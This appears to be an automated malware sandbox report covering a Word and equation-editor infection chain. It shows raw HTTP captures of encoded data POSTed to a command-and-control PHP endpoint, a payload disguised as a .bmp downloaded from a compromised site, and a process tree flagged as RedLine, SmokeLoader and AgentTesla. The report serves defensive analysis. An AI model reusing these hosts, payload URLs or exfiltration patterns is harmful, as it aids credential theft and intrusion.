                                                                                Data Raw: 5b 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 79 6e 70 51 45 4e 32 62 42 2e 22 2c 22 25 30 41 44 69 77 4b 42 77 52 22 2c 22 25 30 41 67 4d 56 59 4b 4e 70 41 4e 6f 5a 70 71 48 22 5d 2c 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 73 3a 2f 2f 58 4d 4d 47 41 44 52 30 4e 70 79 4f 75 33 47 38 2e 6f 72 67 22 2c 22 50 51 57 45 41 79 76 22 2c 22 62 6f 4e 4b 78 48 61 38 33 7a 77 22 5d 5d
                                                                                Data Ascii: [["JDownloader","ynpQEN2bB.","%0ADiwKBwR","%0AgMVYKNpANoZpqH"],["Internet Download Manager","https://XMMGADR0NpyOu3G8.org","PQWEAyv","boNKxHa83zw"]]
                                                                                Nov 22, 2022 05:10:23.186791897 CET5224OUTPOST /xplor/inc/9689eb892f604a.php HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: dropbuyinc.ga
                                                                                Content-Length: 8906
                                                                                Expect: 100-continue
                                                                                Nov 22, 2022 05:10:23.537180901 CET5227OUTData Raw: 70 3d 38 6a 7a 58 72 48 63 79 76 43 34 30 25 32 42 4c 7a 4a 56 35 49 54 4e 44 73 56 73 48 67 73 47 6a 35 5a 76 68 58 46 48 75 57 32 53 4d 25 32 42 44 4f 6d 51 71 66 38 6a 64 65 6a 47 4b 34 31 4f 72 38 52 63 34 45 72 76 5a 32 63 72 4f 58 25 32 42
                                                                                Data Ascii: p=8jzXrHcyvC40%2BLzJV5ITNDsVsHgsGj5ZvhXFHuW2SM%2BDOmQqf8jdejGK41Or8Rc4ErvZ2crOX%2BaLF8iLKB8JJLSsne0BWaIGs59aa8bc%2BnvOK0cE2M4nwAg/PJ35pVqqi1uoukwD1JCN5q27VnQvCjqmLtP5bn%2BchoI2WZw30xYH41Ot8vBesRsZvyBWLPIBEbyJycPN8bZ2/M1fzq/zKOThjSpXzq70yY1%2Bo
                                                                                Nov 22, 2022 05:10:23.643862009 CET5227INHTTP/1.1 100 Continue
                                                                                Nov 22, 2022 05:10:23.716557980 CET5232OUTData Raw: 25 32 42 65 6d 76 77 35 34 47 68 4b 76 4f 6b 33 31 76 43 77 7a 44 4e 39 70 32 66 6a 72 2f 4d 6c 6b 55 4e 41 68 6b 37 36 72 35 2f 45 74 39 50 55 35 4a 66 4e 36 42 32 44 46 4c 4f 78 77 75 30 79 37 64 43 73 57 76 50 4b 33 76 63 48 6b 72 39 37 42 37
                                                                                Data Ascii: %2Bemvw54GhKvOk31vCwzDN9p2fjr/MlkUNAhk76r5/Et9PU5JfN6B2DFLOxwu0y7dCsWvPK3vcHkr97B7vilH55rxmIqDf8UjqW/Ud5B9QaKpVEN0NEi/PbNAYl4r3GEt1xuj%2BRNs2jlHyArGiBxPRyWigSuRA9LDJmtaYRg9kJBaNWsvLsfBZ2Ncr6//lo3T5xZi%2BeklqdT6L9JhytYO394umBDUFhA%2BwEId%2Bzghj
                                                                                Nov 22, 2022 05:10:23.896810055 CET5233OUTData Raw: 61 58 38 4a 4a 6f 48 5a 61 62 39 70 66 77 6b 6d 67 64 6c 70 76 32 6c 2f 43 53 61 42 32 57 6d 2f 61 58 38 4a 4a 6f 48 5a 61 62 39 70 66 77 6b 6d 67 64 6c 70 76 32 6c 2f 43 53 61 42 32 57 6d 2f 61 58 38 4a 4a 6f 48 5a 61 62 39 70 66 77 6b 6d 67 64
                                                                                Data Ascii: aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdlpv2l/CSaB2Wm/aX8JJoHZab9pfwkmgdl
                                                                                Nov 22, 2022 05:10:24.223095894 CET5233INHTTP/1.1 200 OK
                                                                                date: Tue, 22 Nov 2022 04:10:23 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                x-powered-by: PHP/7.2.34
                                                                                content-length: 0
                                                                                content-type: text/html; charset=UTF-8


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9192.168.2.2249180183.78.168.2480C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:10:28.252870083 CET5234OUTGET /wp-content/Mzyroxbxfa.bmp HTTP/1.1
                                                                                Host: www.hzncars.com.my
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:10:28.407993078 CET5235INHTTP/1.1 200 OK
                                                                                Date: Tue, 22 Nov 2022 02:43:20 GMT
                                                                                Server: Apache/2
                                                                                Last-Modified: Mon, 21 Nov 2022 21:05:05 GMT
                                                                                ETag: "20b000-5ee0168e4b869"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 2142208
                                                                                Vary: Accept-Encoding,User-Agent
                                                                                Keep-Alive: timeout=2, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: image/bmp
                                                                                Data Raw: 17 30 f8 78 6b 6a 68 66 7d 6b 63 67 a5 95 68 78 d0 6a 68 66 79 6b 63 67 1a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 da 6a 68 78 66 75 d2 68 79 df 6a aa 7b d2 69 34 a5 4b 3c 0e 10 18 43 17 28 05 0f 0a 09 07 48 05 18 05 0d 08 2e 4a 0a 1d 48 18 1d 08 59 02 0d 47 1e 25 3b 58 05 05 0c 03 57 66 6e 6d 7e 6a 68 78 68 6a 68 66 29 2e 63 67 16 6b 6b 78 04 91 13 05 79 6b 63 67 5a 6a 68 78 88 6a 66 47 72 6a 65 67 5a c2 48 78 68 6c 68 66 79 6b 63 67 54 ad 48 78 68 4a 68 66 79 8b 43 67 5a 6a 28 78 68 4a 68 66 79 69 63 67 5e 6a 68 78 68 6a 68 66 7d 6b 63 67 5a 6a 68 78 68 4a 49 66 79 69 63 67 5a 6a 68 78 6b 6a 28 e3 79 6b 73 67 5a 7a 68 78 68 6a 78 66 79 7b 63 67 5a 6a 68 78 78 6a 68 66 79 6b 63 67 5a 6a 68 78 a8 ac 48 66 32 6b 63 67 5a 8a 48 78 04 69 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 49 78 64 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 4b 63 67 52 6a 68 78 68 6a 68 66 79 6b 63 67 52 4a 68 78 20 6a 68 66 79 6b 63 67 5a 6a 68 78 46 1e 0d 1e 0d 6b 63 67 4e cd 48 78 68 4a 68 66 79 c3 43 67 5a 68 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 48 6a 68 06 57 19 10 15 39 6a 68 78 04 69 68 66 79 8b 43 67 5a 6e 68 78 68 c0 48 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 39 6b 63 a7 74 18 0d 14 07 09 68 66 75 6b 63 67 5a 6a 49 78 68 68 68 66 79 c5 43 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 1a 6a 68 3a 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 89 ad 43 67 5a 6a 68 78 20 6a 68 66 7b 6b 66 67 a2 30 66 78 e8 88 65 66 78 6b 63 67 5a 6a 68 78 10 57 74 66 d3 ee 67 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 6e 40 68 66 57 43 06 73 5a 6c 40 79 68 6a 6e 4c 63 43 06 73 5a 6c 42 78 7a 6a 68 66 53 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6c 50 78 68 6a 68 64 51 7f 63 67 50 4a 68 78 68 6a 16 25 71 6b 67 1c 5e 62 68 7c 51 7e 68 66 79 4d 43 67 5a 6a 68 40 61 6a 68 66 41 ac 9c 98 a5 94 64 78 68 2f 69 66 79 6b 66 67 5a 6a 50 78 68 6a 68 4c 6b 6b 63 67 70 6a 68 78
                                                                                Data Ascii: 0xkjhf}kcghxjhfykcgjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgjhxfuhyj{i4K<C(H.JHYG%;XWfnm~jhxhjhf).cgkkxykcgZjhxjfGrjegZHxhlhfykcgTHxhJhfyCgZj(xhJhfyicg^jhxhjhf}kcgZjhxhJIfyicgZjhxkj(yksgZzhxhjxfy{cgZjhxxjhfykcgZjhxHf2kcgZHxihfykcgZjhxhjhfykcgZjIxdjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfyKcgRjhxhjhfykcgRJhx jhfykcgZjhxFkcgNHxhJhfyCgZhhxhjhfykcgZjhxHjhW9jhxihfyCgZnhxhHfykcgZjhxhjhf9kcthfukcgZjIxhhhfyCgZjhxhjhfykcgjh:hjhfykcgZjhxhjhfCgZjhx jhf{kfg0fxefxkcgZjhxWtfggZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxn@hfWCsZl@yhjnLcCsZlBxzjhfSkcgZjhxhjhfykcgZlPxhjhdQcgPJhxhj%qkg^bh|Q~hfyMCgZjh@ajhfAdxh/ifykfgZjPxhjhLkkcgpjhx
                                                                                Nov 22, 2022 05:10:28.408050060 CET5236INData Raw: 68 6a 68 66 79 6b 63 67 5a 6a 68 78 42 6a 68 66 6b 6b 63 70 70 6a 68 78 69 40 68 66 6b 6b 63 73 70 6a 68 78 72 42 0d 72 79 6d 49 67 48 6a 68 78 42 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6d 5b 67 5a 6a 68 7a 40 7e 68 66 73 53 37 67 5a 6a
                                                                                Data Ascii: hjhfykcgZjhxBjhfkkcppjhxi@hfkkcspjhxrBrymIgHjhxBjhfykcgZjhxhjhfym[gZjhz@~hfsS7gZjPukc"Xjhxjhf|kcgb5hxhhqkgOh~`f}C'rZl~hjlFykcg$)`xlnyoZ^HjhfySj{nhf}KbgZj;`jlKccccLHfykc_BjhfkkcgpjhxhjhfykcgZjhxh/jfykWgZjmxhjP
                                                                                Nov 22, 2022 05:10:28.408104897 CET5237INData Raw: da 95 9c 98 58 68 13 73 68 6a 6c 1b 7c 6b 63 63 62 a7 97 87 97 68 13 6d 79 6b 67 74 59 52 6c 87 97 95 79 67 43 bd 9d 98 a5 52 d0 86 97 95 50 43 86 94 9c 5f 87 95 97 87 6a 68 13 6d 79 6b 67 76 58 79 6e 6b 6f 75 96 15 6c 6b 63 61 7f 7b 6f 05 7d 6a
                                                                                Data Ascii: Xhshjl|kccbhmykgtYRlygCRPC_jhmykgvXynkoulkca{o}jhb\zeIjh||hfsogZnPnhjhdnhgZnPkkcgb3hwocg^Jaxhj%qkgmh|QcMCvZjh@{ikZjljhlfcg^R.~uyKigZjvmjPe!chxl{lq agZnHthjh:ccc!oxlPE
                                                                                Nov 22, 2022 05:10:28.408175945 CET5238INData Raw: 21 7e 68 78 6c 4a 53 7d 32 02 3a 08 43 6a 68 72 48 6e 68 66 79 15 20 6f 5a 6e 13 67 60 6a 6c 5f 5b 94 9c 98 7c 4a 68 78 68 6a 50 71 86 94 9c 65 21 78 68 78 6c 68 13 70 79 6b 67 7a 03 05 71 78 68 60 50 2c 79 6b 63 65 58 11 7e 78 68 6e 15 76 79 6b
                                                                                Data Ascii: !~hxlJS}2:CjhrHnhfy oZng`jl_[|JhxhjPqe!xhxlhpykgzqxh`P,ykceX~xhnvykgG]jhx)`f}MoZnR@YlcgZRjvkccIkHzhjh^KkCNAzhs~jhbAkcgZRjokccE*(F|kcgdhxPzb^PkcgHjhnBjhfkkcgpjhxzjhrSkcgTjhyBjhfkkcspjh
                                                                                Nov 22, 2022 05:10:28.408215046 CET5239INData Raw: 68 6e 50 16 86 94 9c 65 4f 17 70 78 68 6e 50 55 78 6b 63 71 49 6f 48 7a 68 6a 68 5e 93 95 9c 98 58 7b 6a 05 71 6a 68 62 41 33 63 67 5a 7c 7b 7d 48 66 68 66 79 53 b3 99 a5 95 79 7a 48 88 cf 2d 1c 0a 70 65 7a 62 68 78 68 52 d4 98 86 94 61 19 31 62
                                                                                Data Ascii: hnPeOpxhnPUxkcqIoHzhjh^X{jqjhbA3cgZ|{}HfhfySyzH-pezbhxhRa1bh|@}fS[gZjjgpfyoCgZjh+bhbukg^SNFykcgbhakccznhxhR=Xxjhfecgb7}{cAcgZ{iA'YlcgZR jdkccM3{{PhfyiyZjljhl{xgZnkjRrezlFh
                                                                                Nov 22, 2022 05:10:28.408278942 CET5240INData Raw: 7c 6b 63 6a 5e 6a 68 49 6b 6a 68 24 7d 6b 63 49 5c 6a 68 5c 6e 6a 68 b7 7a 6b 63 d9 5b 6a 68 b7 68 6a 68 39 7a 6b 63 d5 5f 6a 68 19 6c 6a 68 67 7f 6b 63 64 5e 6a 68 62 69 6a 68 58 78 6b 63 5f 46 6e 68 78 79 61 77 5d 18 78 68 47 57 6a 68 78 16 29
                                                                                Data Ascii: |kcj^jhIkjh$}kcI\jh\njhzkc[jhhjh9zkc_jhljhgkcd^jhbijhXxkc_Fnhxyaw]xhGWjhx)`f}{oZnRS@YccgZRHPzkcG~jhxP{SgZjHphjh^{KiwC0/kfykcZjzhj,fyk[Zjh@ihfAQfgZ{lgQ3-eykcTijhB|kcG_jhx)`f}JoZnR@YgcgZRP{kc_nhxsyoFYkc
                                                                                Nov 22, 2022 05:10:28.408338070 CET5242INData Raw: dc 91 97 87 79 6c 77 5b 18 78 65 5f 33 96 97 87 77 96 7b 63 59 6f 63 67 5a 14 2b 70 68 6e 13 6a 71 6b 67 5e 38 91 97 87 4e 4a 69 66 79 6b 5b 30 a1 95 97 40 b5 94 97 99 59 6d 63 67 5a 52 20 83 97 95 50 48 79 6b 63 5f bd 6a 68 78 7f 79 6c 5e 7c 94
                                                                                Data Ascii: ylw[xe_3w{cYocgZ+phnjqkg^8NJifyk[0@YmcgZR PHykc_jhxyl^|Knw@yl^&LRyzhjPm{kc_Phfyzdx`{PJtt]JAxhjPzjh|{`Hzykc_P5S~fZjw{iP1xkc_H}hfySw{hPpIlH_hjh^E{xHJhfySXhjlrjpozsh
                                                                                Nov 22, 2022 05:10:28.408379078 CET5243INData Raw: 97 95 50 f9 7d 6b 63 47 52 6a 68 78 50 df 96 99 86 74 1c 74 5e 52 0b 7b 68 6a 77 96 6a 6b 43 4f 5a 6a 68 06 2b 62 68 62 02 24 6b 67 5e 50 fc 86 97 95 4e 46 6a 6b 63 67 62 e3 96 87 97 52 6f 63 79 6b 5b f3 5a 6a 68 40 e7 6a 68 66 41 ca 60 67 5a 7d
                                                                                Data Ascii: P}kcGRjhxPtt^R{hjwjkCOZjh+bhb$kg^PNFjkcgbRocyk[Zjh@jhfA`gZ}{{PifySeZjHzhjh:ccc!d`xlP<EGIjhxP#SdZjH[hjhwbc_hylw& .`gZj{hjbykPkijh^'kcgb'ufuzKzgZjP{^?kcgz}hxhR|IlPkjhw|t\IoH|hjh^MyiXyjh
                                                                                Nov 22, 2022 05:10:28.408425093 CET5244INData Raw: ba 94 9c 98 f2 91 97 87 48 71 68 66 79 15 20 6f 5a 6e 13 92 6f 6a 6c 5c d3 91 9c 98 7c 4a 60 78 68 6a 50 f9 83 94 9c 5f fc 96 97 87 50 1f 68 66 79 7d 70 63 7a 4a 68 78 68 52 e0 9c 86 94 7c 68 49 69 50 4e 94 95 97 79 03 78 64 5f 29 96 97 87 73 79
                                                                                Data Ascii: Hqhfy oZnojl\|J`xhjP_Phfy}pczJhxhR|hIiPNyxd_)syo^bRrbE\1=kjhfYdcgZR,PG^jhx)`f}soZnRS@YlcgZRHy`fWt\RDwjkCnZjh@nhi|[/kxhj+0Hsykcbh|V`f}RNXxjhfA
                                                                                Nov 22, 2022 05:10:28.408560038 CET5245INData Raw: 40 42 0d 6c 68 6c 42 66 6b 6b 63 67 70 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6c 50 66 79 6b 63 65 72 7e 68 78 62 4a 68 66 79 6b 1d 24 52 6a 6c 03 9f 6d 68 62 43 7f 63 67 5a 4c 48 78 68 6a 68 5e 70 6b 63 67 62 ad 97 87 97 94 64 66 79 2e
                                                                                Data Ascii: @BlhlBfkkcgpjhxhjhfykcgZjhxhlPfykcer~hxbJhfyk$RjlmhbCcgZLHxhjh^pkcgbdfy.bgZjmxhjPfykcMDh[hjlLkkcgpjhxhjhfykcgZjhxzjhrSkcgHjhxBjhfykcgZjhxhjhfkkcspjhxzjhfSkcgbjhxh@hfkkcspjhxzjhfSkcgZjhxhjhfykcgHjhoBjhfxAcgHjhlBjhfcCsZlBxzjhfSkcgZjh
                                                                                Nov 22, 2022 05:10:28.562733889 CET5246INData Raw: 97 95 77 1b 6a 6b 43 6c 5a 6a 68 06 2b 62 68 62 02 3a 6b 67 5e 53 13 85 97 95 4e 46 5b 6b 63 67 62 1a 95 87 97 7b 69 79 47 0a 70 66 7a 7c 68 78 68 52 37 9b 86 94 72 61 45 5c 09 6b 6e 4a 68 66 79 6b 1d 24 52 6a 6c 03 23 62 68 62 40 2f 9e 98 a5 4c
                                                                                Data Ascii: wjkClZjh+bhb:kg^SNF[kcgb{iyGpfz|hxhR7raE\knJhfyk$Rjl#bhb@/LHxhjh^@KjwG1/kfykL^!eykCaZjh+bhbrkg^PgNF~kcgbnRClZjh@AagZJbxhj%qkgkbh|QMCAZjh@fpfzNhxhR|IcPijh^z~hxhR|IlP


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.224917469.160.38.3443C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2022-11-22 04:09:05 UTC0OUTGET /contract/2022-11-14_02-53.iso HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: ndtcconsultant.com
                                                                                2022-11-22 04:09:06 UTC0INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 22 Nov 2022 04:09:04 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                2022-11-22 04:09:06 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.22491773.232.242.170443C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2022-11-22 04:10:16 UTC0OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2022-11-22 04:10:16 UTC0INHTTP/1.1 200 OK
                                                                                Server: Cowboy
                                                                                Connection: close
                                                                                Content-Type: text/plain
                                                                                Vary: Origin
                                                                                Date: Tue, 22 Nov 2022 04:10:16 GMT
                                                                                Content-Length: 14
                                                                                Via: 1.1 vegur
                                                                                2022-11-22 04:10:16 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 36
                                                                                Data Ascii: 102.129.143.16


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:05:08:09
                                                                                Start date:22/11/2022
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                Imagebase:0x13f580000
                                                                                File size:1423704 bytes
                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Target ID:5
                                                                                Start time:05:08:22
                                                                                Start date:22/11/2022
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Target ID:7
                                                                                Start time:05:08:27
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\Public\regasm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\Public\regasm.exe"
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.928771662.00000000002D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 35%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:9
                                                                                Start time:05:08:29
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\Public\regasm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\Public\regasm.exe"
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low

                                                                                Target ID:11
                                                                                Start time:05:08:35
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                Imagebase:0xff040000
                                                                                File size:3229696 bytes
                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high

                                                                                Target ID:12
                                                                                Start time:05:09:11
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\System32\taskeng.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskeng.exe {C1BB133C-EA54-4D9F-8B7A-F076882918C7} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                Imagebase:0xff6b0000
                                                                                File size:464384 bytes
                                                                                MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Target ID:13
                                                                                Start time:05:09:11
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.1022592251.0000000000298000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 35%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:14
                                                                                Start time:05:09:13
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low

                                                                                Target ID:15
                                                                                Start time:05:09:16
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                Imagebase:0x1a0000
                                                                                File size:123904 bytes
                                                                                MD5 hash:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
